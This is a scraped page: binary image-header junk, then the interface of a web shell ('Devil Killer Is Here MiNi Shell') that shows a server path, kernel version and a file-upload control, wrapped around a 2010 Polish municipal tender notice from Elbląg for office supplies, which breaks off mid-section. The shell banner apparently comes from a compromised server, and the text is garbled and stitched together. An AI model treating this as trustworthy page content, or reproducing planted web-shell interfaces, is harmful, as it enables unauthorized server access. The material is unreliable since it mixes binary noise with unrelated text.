JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100217/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100217/33229-N-2010.html

<p class="kh_header"><b>Elbląg: Dostawa materiałów biurowych</b><br>
<b>Numer ogłoszenia: 33229 - 2010; data zamieszczenia: 17.02.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina - Miasto Elbląg , ul. Łączności 1, 82-300 Elbląg, woj. warmińsko-mazurskie, tel. 55 235 35 36, 55 239 31 25, faks 55 239 33 34.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.umelblag.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów biurowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest:
	
Dostawa materiałów biurowych


Przedmiot główny:
Nazewnictwo wg CPV:	Papier do drukowania

Przedmioty dodatkowe:
Nazewnictwo wg CPV:	Różny sprzęt i artykuły biurowe
Nazewnictwo wg CPV:	Części i akcesoria do maszyn biurowych
Nazewnictwo wg CPV:	Skoroszyty i podobne wyroby
Nazewnictwo wg CPV:	Rejestry, księgi rachunkowe, skoroszyty, formularze i inne wyroby piśmiennicze z papieru lub tektury
Nazewnictwo wg CPV:	Noże i nożyczki
Nazewnictwo wg CPV:	Niszczarki


	Przedmiot i zakres zamówienia obejmuje dostawę niżej wymienionych materiałów biurowych:

1	BLOK TECHNICZNY A4 biały - 20 kartek w bloku.
2	BLOK z makulatury o formacie A4 - 50 kartek w bloku.
3	BLOK z makulatury o formacie A5 - 50 kartek w bloku.
4	CIENKOPIS do pisania na płytach CD-R oraz na foliach czarny S=0,4mm - szybkoschnący.
5	CIENKOPIS  - CZARNY, gr. linii 0,4mm, końcówka oprawiona w metal, wentylowana skuwka, odporny na wysychanie tusz, obudowa wraz z zatyczką  sześciokątna.
6	CIENKOPIS - CZERWONY, gr. linii 0,4mm, końcówka oprawiona w metal, wentylowana skuwka, odporny na wysychanie tusz, obudowa  wraz z zatyczką sześciokątna.
7	CIENKOPIS  - NIEBIESKI, gr. linii 0,4mm, końcówka oprawiona w metal, wentylowana skuwka, odporny na wysychanie tusz, obudowa wraz z zatyczką  sześciokątna.
8	CIENKOPIS   - ZIELONY, gr. linii 0,4mm, końcówka oprawiona w metal, wentylowana skuwka,  odporny na wysychanie tusz, obudowa wraz z zatyczką  sześciokątna.
9	DŁUGOPIS  - automatyczny, metalowe wykończenia, z wkładem metalowym, wielkopojemnym.
10	DŁUGOPIS na sprężynce  - Z WYMIENNYM WKŁADEM, PODSTAWKA PRZYKLEJANA DO PODŁOŻA, PRZEZROCZYSTA OBUDOWA UMOŻLIWIA KONTROLĘ ZUŻYCIA, ISTNIEJE MOŻLIWOŚĆ REGULACJI NACHYLENIA UMIESZCZANIA DŁUGOPISU,  SPRĘŻYKA ODPORNA NA ROZCIĄGNIĘCIA .
11	ETYKIETY białe, matowe na płyty CD,  samoprzylepne, na arkuszu 2 etykiety o średnicy 117 mm - w szt. arkuszy.                                                          
12	ETYKIETY do drukarki ZEBRA GK 420 d o wymiarach 50 mm x 30 mm - w rolkach po 1000 szt.
13	FOLIA do laminowania A4 2x100mic.w opakowaniach po 100szt.
14	FOLIA do laminowania A5 2x100mic.w opakowaniach po 100 szt.
15	FOLIA do plotera  HP DJ 800 MATOWA 75MY. 0.914X20MT.
16	GRAFITY Hi-Polymer do ołówków PENTEL 0,5 B- małe opakowania
17	GRAFITY Hi-Polymer do ołówków PENTEL 0,5 2B - małe opakowania
18	GRAFITY Hi-Polymer do ołówków PENTEL  0,5 HB - małe opakowania
19	GRZBIETY DO BINDOWANIA 14 MM - NIEBIESKIE W SZT.          
20	GRZBIETY DO BINDOWANIA 19 MM - ZIELONE W SZT.          
21	GRZBIETY DO BINDOWANIA 50 MM - CZARNE W SZT.          
22	GUMKI RECEPTURKI - WYTRZYMAŁE I ELASTYCZNE o średnicy 70 mm, grubość 1,5 mm, szerokość 2mm -w opak.100G.
23	GUMKA  o wymiarach nie mniejszych niż 3,5x1,6x1,2 cm. - ściera ołówek i grafit nie naruszając struktury papieru, nie brudzI, posiada ruchomą kartonową osłonę.
24	IDENTYFIKATORY  ze smyczą i klipsem do przypinania w dwóch położeniach, wykonane ze sztywnego przezroczystego tworzywa- w szt. o wym.7,5 x 11, 4 cm. Dla celów bezpieczeństwa smycz posiada specjalny plastikowy zamek otwierający się w razie silnego pociągnięcia.
25	KALKULATOR  - duży wyświetlacz, podwójna pamięć, zaokrąglanie wyników, obliczanie marży, klawisz podwójnego zera, klawisz cafania, o wym. nie mniejszych niż 20 cm x 15,5 cm, gwarancja 24 miesiące 
26	KLEJ SZTYFT   - minimum 22 g, do klejenia papieru, zdjęć,tektury, tkaniny i innych materiałów.Użyty klej wysycha natychmiast nie powodując marszczenia papieru. 
27	KOPERTA C4 biała samoklejąca z paskiem (229x324mm) - w szt.
28	KOPERTA B5 biała samoklejąca z paskiem (176x250mm) - w szt.
29	KOPERTA DL biała, samoprzylepna, bez okienka (110x220mm) - w szt.
30	KOPERTA DL biała, samoprzylepna, okienko z prawej strony (110x220mm) - w szt.                             
31	KOPERTA C6 biała, samoprzylepna (114x162mm) - w szt.
32	KOPERTA z zabezpieczeniem powietrznym AIR POC o wym. zew. 170x225mm - w szt.
33	Koperta z poszerzonymi bokami i dnem o wym.255x390x40 w szt.
34	Koperta z poszerzonymi bokami i dnem o wym.229x324x40 w szt.
35	KOREKTOR W PIÓRZE BIAŁY   - minimum 7 ml, szybkoschnący, z metalową końcówką
36	KOREKTOR W PŁYNIE  - minimum 20ml, biały, szybkoschnący     
37	KOSZULKA  A4   z folii o gr. 50 mikronów, krystaliczna, w opak. 100 szt.
38	LINIJKA 20 cm - plastikowa, przezroczysta.
39	LINIJKA 30 cm - plastikowa, przezroczysta. 
40	LINIJKA SKALÓWKA trójkątna z podziałką do skalowania  - SKALA1:2,5,  1:5, 1:10, 1:20, 1:50, 1:100                                                                                                                                                              
41	LISTWA do bindowania  A4-  6 mm
42	LISTWA do bindowania  A4- 12 mm
43	LISTWA do bindowania A-4- 20 mm 
44	MAGNESY DO TABLICY MAGNETYCZNEJ suchościeralnej o śred.2 cm - w szt.
45	MARKER  permanentny, wodoodporny, nie zawiera ksylenu, może pozostawać bez skuwki do 14 dni i nie wyschnie; gr. linii 2mm, okrągła końcówka, czarny.
46	MARKER  permanentny, wodoodporny, nie zawiera ksylenu, może pozostawać bez skuwki do 14 dni i nie wyschnie; gr. linii 2mm, okrągła końcówka, czerwony.
47	MARKER  permanentny, wodoodporny, nie zawiera ksylenu, może pozostawać bez skuwki do 14 dni i nie wyschnie; gr. linii 2mm, okrągła końcówka, niebieski.
48	MARKER  permanentny, wodoodporny, nie zawiera ksylenu, może pozostawać bez skuwki do 14 dni i nie wyschnie; gr. linii 2mm, okrągła końcówka, zielony.
49	MARKER olejowy    - biały   szybkoschnący, nie zawiera ksylenu, gr.linii  pisania 1mm, pisze po każdej powierzchni, odporny na ścieranie, działanie wody i światła.
50	MARKER olejowy   - czarny,   szybkoschnący, nie zawiera ksylenu, gr.linii  pisania 1mm, pisze po każdej powierzchni, odporny na ścieranie, działanie wody i światła.
51	Markery do tablic suchościeralnych - w kompletach.  W komplecie  4 szt./4 kolory/.
52	MAZAKI - flamastry 12 kolorów - w kpl.
53	NOTES KOSTKA do przyborników BIAŁA klejona    83 x 83 mm x 500 kartek -  w kostkach
54	NOTES samoprzylepny - w bloczku 100 karteczek w żółtym kolorze  o wym. 38 x 51 mm.
55	NOTES samoprzylepny - w bloczku 100 karteczek w żółtym kolorze  o wym. 76 x 76 mm.
56	NOTES ze skorowidzem na telefony - wym.12cm x 21cm
57	OFERTÓWKA A4 przezroczysta, wykonana z folii PCV o gr. 150 mikr. - w szt.
58	OKŁADKI NIEBIESKIE I ZIELONE do bindowania A4 CHROMOLUX  - w opak. po 100 szt..
59	OKŁADKA PRZEZROCZYSTA  bezbarwna do bindowania 0,20 mm  A4 - w opak. po 100 szt..
60	OŁÓWEK AUTOMATYCZNY - gr.linii 0,5 mm , z metalową końcówką, z metalowym zasobnikiem zabezpieczającym na grafity, mechanizm ołówka gwarantuje zużycie grafitu aż w 95%, posiada długą, regulowaną gumkę. 
61	OŁÓWEK o twardości HB z gumką
62	PAPIER FOTOGRAFICZNY FORMAT A4 GRUB. 180G/M2 do drukarek atramentowych w szt.
63	PAPIER DO PLOTERA  HP  DJ 800 50/90G/M2 0,914X45 M -  w rolkach.
64	PAPIER samoprzylepny A4 - w szt. ŻÓŁTY
65	PAPIER samoprzylepny A4 - w szt. ZIELONY
66	PAPIER samoprzylepny A4 - w szt. POMARAŃCZ.
67	PAPIER samoprzylepny A4 - w szt. BIAŁY
68	PAPIER CZERPANY A4 BEŻOWY- FAKTURA PŁÓTNA  z czteroma naturalnie uformowanymi krawędziami - w szt.
69	PAPIER WIZYTÓWKOWY BIAŁY A4 - 4 rodzaje faktury papieru gr. 230g/m2 -  w szt.
70	PAPIER DO DRUKU DYPLOMÓW A4 ZIELONY MARMUREK -  gr. 200 g/m2  - w szt.
71	PAPIER DO DRUKU DYPLOMÓW A4 BEŻOWY MARMUREK -  gr. 200 g/m2 - w szt.
72	PAPIER XERO  kolorowy  o formacie A4, gramatura 80g/m2 -POMARAŃCZOWY- w ryzach po 500 ark.
73	PAPIER XERO kolorowy o formacie A4, gramatura 80g/m2- ZIELONY/jasny/ - w ryzach po 500 ark.
74	PAPIER XERO kolorowy o formacie A4, gramatura 80g/m2 - ŻÓŁTY- w ryzach po 500 ark.
75	PAPIER XERO   A3, gramatura 80 g/m2, o białości nie mniejszej niż CIE 161- w ryzach po 500 ark.
76	PAPIER XERO   A4, gramatura 80 g/m2, o białości nie mniejszej niż CIE 161 - w ryzach po 500 ark.
77	PINEZKI zwykłe  -  małe pudełka po 100 szt. - w szt. pudełek.
78	PINEZKI kołeczki - w opak. po 200 szt.
79	PIÓRO ŻELOWE, PRZEZROCZYSTA OBUDOWA Z METALIZOWANĄ KOŃCÓWKĄ - Z WYMIENNYM WKŁADEM, TUSZ WODOODPORNY I NIE BLAKNĄCY W ŚWIETLE SŁONECZNYM, PISZE CIENKO I BEZ PRZERYWANIA, GRUB. LINII PISANIA OK. 0,3 MM, WYPOSAŻONE W PRZEZROCZYSTĄ ZATYCZKĘ Z OZNACZENIEM KOLORU WKŁADU,  /czarne i niebieskie/.
80	PLASTELINA  w opakowaniu 6 kolorów.
81	PODUSZKI do pieczątek - CZERWONE o wym.11cmx7cm
82	PODUSZKI do pieczątek - CZERWONE o wym.20cmx12cm
83	POJEMNIK na CD NA 100 szt.
84	PRZEKŁADKI PLASTIKOWE do segregatora A4 w kompletach - w 1 kpl. 10 kolorowych przekładek.
85	ROLKA KASOWA TERMICZNA  szer.57 mm dł. 30 mb.
86	ROLKA TERMICZNA do kasy fiskalnej 28 mmx 30m
87	ROZSZYWACZ do zszywek.
88	SEGREGATOR A5  szerokość grzbietu 7 cm, oklejony na zewnątrz i wewnątrz folią PCV, wzmocnione krawedzie dolne.
89	SEGREGATOR A4  szerokość grzbietu 5 cm, oklejony na zewnątrz folią PP, wewnątrz biała nabłyszczana wyklejka papierowa, dolne krawędzie wzmocnione metalową szyną.
90	SEGREGATOR A4  szerokość grzbietu 7,5 cm, oklejony na zewnątrz folią PP, wewnątrz wyklejka papierowa, dolne krawędzie wzmocnione metalową szyną.
91	SEGREGATOR A4 archiwizacyjny, szer.grzbietu 8 cm, wykonany z tektury o gr.2mm, w kolorze naturalnego kartonu.
92	SKOROSZYT Z ZAWIESZKĄ  A 4 -połówka, wykonany z kartonu 280 g/m2 w kolorze białym, z metalowym wąsem umożliwiającym wpinanie akt.
93	SKOROSZYT plastikowy A4 - przednia okładka przezroczysta, tylna kolorowa z metalowym wąsem, na grzbiecie pasek do opisu
94	SKOROSZYT PCV A4 z europerforacją,pojemność 2 cm, dwustronnie zapisywalny pasek brzegowy. Dziurkowanie: 11/euro pozwala na wpięcie do każdego segregatora, przednia okładka przezroczysta, tylna kolorowa z metalowym wąsem.
95	SKOROSZYT zwykły A4 z fałdą poprawiającą sztywność grzbietu, wykonany z kartonu 280 g/m2 w kolorze białym, z metalowym wąsem umożliwiającym wpinanie akt
96	SKOROSZYT oczkowy A4 z otworami pozwalającymi na wpięcie do segregatora, wykonany z kartonu 280 g/m2 w kolorze białym, z metalowym wąsem umożliwiającym wpinanie akt.
97	SKOROSZYT zaczepowy A4- z zawieszką pozwalającą na wpięcie do segregatora, wykonany z kartonu 280 g/m2 w kolorze białym, z metalowym wąsem umożliwiającym wpinanie akt.
98	SKOROSZYT oczkowy A4-połówka,z otworami pozwalającymi na wpięcie do segregatora, wykonany z kartonu 280 g/m2 w kolorze białym, z metalowym wąsem umożliwiającym wpinanie akt.
99	SKOROWIDZ A4 alfabetyczny, 96 kartek w kratkę. 
100	SKOROWIDZ A5 alfabetyczny, 96 kartek w kratkę.
101	SPINACZE BIUROWE 25 mm, trójkątne, srebrne - w opakowaniach po 100 szt. Spinaczy.
102	SPINACZE BIUROWE 50 mm, owalne, srebrne w opakowaniach po 100 szt. spinaczy
103	SPINACZE KLIPSY  25 mm -  w szt.
104	SPINACZE KLIPSY  32 mm -  w szt.
105	SZNUREK jutowy do pakowania - w kłębkach 10 dkg.
106	SKŁADANKA - papier komputerowy 210x12x2, 6 CALI , oryginał -kolor biały, kopia - różowa,  900 składek/karton.
107	SKŁADANKA - papier komputerowy 390x12x1,  900 składek/karton.
108	TABLICA KORKOWA o wym.90 x120 cm z ramą drewnianą.
109	TABLICA KORKOWA o wym. 30 X 45  cm z ramą drewnianą.
110	TABLICA KORKOWA o wym. 90 X 60 cm z ramą drewnianą. Tablicę można zawiesić na ściane w układzie pionowym lub poziomym.
111	TACKI NA DOKUMENTY -plastikowe, przezroczyste o wymiarach 350x245x60mm
112	TAŚMA KLEJACA 3/4 przezroczysta (szpula 18mm x 20 m)
113	TAŚMA KLEJĄCA PAKOWA o szer.50mm dł 66m
114	TAŚMA dwustronnie klejąca szer. 38mm dł.10 m
115	TECZKA DO PODPISU A4, z 12 przekładkami typu , wykonana z mocnego kartonu powlekanego kolorową folią polipropylenową, na frontowej okładce okienka do opisu, harmonijkowy grzbiet zapewniający dużą pojemność.Gumki zamykające w kolorze teczki.
116	TECZKA WIĄZANA A4, wykonana z białego kartonu 280 g/m2, posiadająca trzy wewnętrzne klapy.
117	TECZKA kartonowa A4 z narożnymi gumkami, wykonana z białego kartonu 280 g/m2, z trzema wewnętrznymi klapami.
118	TECZKA jednostronnie lakierowana kolorowa A4 z mocnego kartonu 280 g/m2 z gumkami narożnymi w kolorze teczki.
119	TECZKA z gumką  - DWUSTRONNIE BARWIONA, laminowana kolorową folią polipropylenową, tektura twarda 1 mm, grzbiet 10 mm.
120	TEMPERÓWKA - metalowa , ze stalowym ostrzem mocowanym wkrętem, rowkowania  w korpusie ułatwiają trzymanie.
121	TUSZ do pieczątek ręcznych i samotuszujących z gumową i polimerową płytką stemplującą - o pojemności 25 ml czerwony
122	TUSZ do pieczątek ręcznych i samotuszujących z gumową i polimerową płytką stemplującą - o pojemności 25 ml czerwony
123	WKŁAD kulkowy 0,5 mm czarny do pióra PARKER VEKTOR
124	WKŁAD kulkowy 0,5 mm niebieski do pióra PARKER
125	WKŁAD żelowy do długopisu PARKER -  0,7 niebieski
126	WKŁAD wielkopojemny metalowy do długopisu z poz.9  - niebieski
127	WKŁAD wielkopojemny metalowy do długopisu z poz.9  - czarny
128	WKŁAD  do pióra żelowego z poz.79 - czarny
129	WKŁAD  do pióra żelowego z pozycji 79 - niebieski
130	WKŁAD  do pióra żelowego z pozycji 79 - czerwony
131	WKŁAD do długopisu na sprężynce z poz. 10 
132	WORKI do niszczarki 160 l w szt.
133	WORKI DO niszczarki 120 l w szt.
134	ZAKREŚLACZ tekstu ze ścietą końcówką o szerokości  5 mm, do pisania na wszystkich rodzajach papieru, ZIELONY
135	ZAKREŚLACZ tekstu ze ścietą końcówką o szerokości  5 mm, do pisania na wszystkich rodzajach papieru, ŻÓŁTY
136	ZAKREŚLACZ tekstu ze ścietą końcówką o szerokości  5 mm, do pisania na wszystkich rodzajach papieru, POMARAŃCZOWY
137	ZESZYT A4 - 192 kartkowy w kratkę  
138	ZESZYT A4 - 96 kartkowy w kratkę, twarda okładka
139	ZESZYT B5 -P 160 kartkowy w kratkę, twarda okładka         
140	ZESZYT A5 - 96 kartkowy w kratkę, twarda okładka
141	ZSZYWKI  24/6 -małe opakowania po 1000 szt. zszywek
142	ZSZYWKI   23/10 - małe opakowania po 1000 szt. zszywek
143	WORKI SANITARNE MOCNE 120 l, o wym. 70x110cm, gr. folii 30 mikronów, w  szt.
144	RĘKAWICE foliowe jednorazowe, rozmiar średni, z folii HDPE, w  szt.
145	Niszczarka biurowa posiadająca: automatyczny start/stop, kosz o pojemności od 23l do 27l, szerokość wejścia  od 225 mm do 240 mm,  zabezpieczenie przed przegrzaniem, funkcję ręcznego cofania papieru, funkcję atomatycznego cofania papieru w momecie zablokowania papieru przez przepełnienie kosza. Tnie na ścinki , rozmiar ścinka od 2x18 mm do 4x35mm, tnie jednocześnie od 8 do 15 kartek o grub. 80g/m2 oraz tnie karty plastikowe, zszywki i małe spinacze biurowe. Gwarancja na niszczarkę 24 miesiące, na noże tnące 120 miesięcy.

Szczegółowy opis przedmiotu i zakres zamówienia zawiera Załącznik do formularza OFERTA Szczegółowy opis, zakres i wycena przedmiotu zamówienia, którego wzór stanowi ZAŁĄCZNIK NR 1 do SIWZ.

Miejsce dostawy: Urząd Miejski w Elblągu, 82-300 Elbląg, ul. Łączności 1.

2.	Zamawiający wymaga wykonania dostawy w dwóch etapach - zgodnie z Załącznikiem do formularza OFERTA Szczegółowy opis, zakres i wycena przedmiotu zamówienia, którego wzór stanowi ZAŁĄCZNIK NR 1 do SIWZ.

3.	Zamawiający wymaga, aby dostarczone materiały biurowe były fabrycznie nowe, w oryginalnych opakowaniach producenta, z okresem ważności dla przedmiotów z każdego etapu dostawy minimum 12 miesięcy.

4.	Zamawiający wymaga udzielenia następujących gwarancji na oferowany przedmiot, licząc od dnia dostarczenia go do siedziby Zamawiającego:
1) na kalkulatory							-   24 miesiące
2) na niszczarkę							-   24 miesiące
3) na noże tnące do niszczarki, 						- 120 miesięcy
	4) na pozostałe przedmioty zamówienia każdego etapu dostawy		- minimum 12 miesięcy

5.	Dla przedmiotów wyróżnionych w Załączniku do formularza OFERTA Szczegółowy opis, zakres i wycena przedmiotu zamówienia, którego wzór stanowi ZAŁĄCZNIK NR 1 do SIWZ zaciemnieniem Zamawiający wymaga złożenia wraz z ofertą kolorowych kart katalogowych lub kolorowych wydruków z kart katalogowych umieszczonych na stronie internetowej przedstawiających przedmioty zamówienia wraz z opisem parametrów technicznych tych przedmiotów, potwierdzające, że oferowane przedmioty spełniają wymagania Zamawiającego.
 Kolorowe karty katalogowe lub kolorowe wydruki z kart katalogowych muszą być oznaczone numerem  odpowiadającym liczbie porządkowej pozycji przedmiotu z Załącznika do formularza OFERTA Szczegółowy opis, zakres i wycena przedmiotu zamówienia, którego wzór stanowi ZAŁĄCZNIK NR 1 do SIWZ.
		
6.	Zamawiający wymaga, aby wszystkie przedmioty zamówienia opisane w Załączniku do formularza  OFERTA Szczegółowy opis, zakres i wycena przedmiotu zamówienia, którego wzór stanowi ZAŁĄCZNIK NR 1 do SIWZ, które mają określoną gramaturę papieru lub tektury muszą posiadać oznaczenie tej gramatury na poszczególnych przedmiotach zamówienia lub na zbiorowym opakowaniu, bądź inny dokument potwierdzający spełnienie tych wymagań. 

7.	Zamawiający nie zastrzega w SIWZ, że część lub całość zamówienia nie może być powierzona podwykonawcom. Zamawiający żąda wskazania przez Wykonawcę w ofercie części zamówienia, której wykonanie powierzy podwykonawcom..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.76.30-1, 30.19.00.00-7, 30.12.40.00-4, 22.85.00.00-3, 22.80.00.00-8, 39.24.10.00-3, 30.19.14.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 07.09.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potwierdzenia spełniania tego warunku Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunkiem udziału w postępowaniu jest wykonanie w sposób należyty w okresie ostatnich 3 lat przed upływem terminu składania ofert minimum 2 dostaw materiałów biurowych o wartości minimum 85 000,00 zł netto każda.

Przy ocenie spełniania tego warunku udziału przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum) wielkości stanowiące o spełnianiu warunku, tj. liczba dostaw, będą zsumowane z dokumentów składanych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Natomiast sumowaniu nie podlega wartość dostaw, tj. każda wykazana dostawa musi mieć wartość minimum 85 000,00 zł netto każda.

Wartości podane w walutach innych niż wskazane przez Zamawiającego należy przeliczyć wg średniego kursu NBP na dzień zakończenia wykonywania dostawy, podając datę i kurs.

Potwierdzenia spełniania tego warunku Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ oraz dokumentów wymienionych w pkt VI. ppkt 1.2. SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potwierdzenia spełniania tego warunku Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potwierdzenia spełniania tego warunku Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
